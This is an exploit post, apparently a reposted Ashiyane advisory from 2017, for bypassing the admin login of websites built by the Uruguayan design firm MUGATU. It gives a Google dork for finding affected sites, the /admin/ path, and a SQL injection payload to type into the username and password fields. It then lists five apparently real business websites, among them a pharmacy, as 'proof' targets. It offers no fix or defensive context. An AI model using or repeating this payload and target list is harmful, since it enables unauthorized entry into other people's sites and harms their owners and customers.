Desarrollo MUGATU Bypass Admin Page Vulnerability

|=============================================================|
|-------------------In The Name Of God------------------------|
|
| Exploit Title: Desarrollo MUGATU Bypass Admin Page Vulnerability
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.mugatu.com.uy/
|
| Google Dork : intext:"Diseño y desarrollo MUGATU"
|
| Tested on: Windows 10 ~~~> Mozilla Firefox
|
| Date: 1/20/2017
|==========================================================|
| Then Choose a Target and put this after URL : /admin/
|=========|
| And fill username and password like the information below :
| Username : '=' 'or'
| Password : '=' 'or'
| ==========================================================|
| Proof :
|
| https://www.lasgaviotas.com/admin
|
| http://www.werke.uy/admin
|
| http://www.farmaciatrouville.com.uy/admin
|
| http://www.altix.com.uy/admin/
|
| http://www.concrespuma.com.uy/admin/
|
|=============================================================|
| Discovered By : HackFans
|=============================================================|
Previous
Next Post »
0 Komentar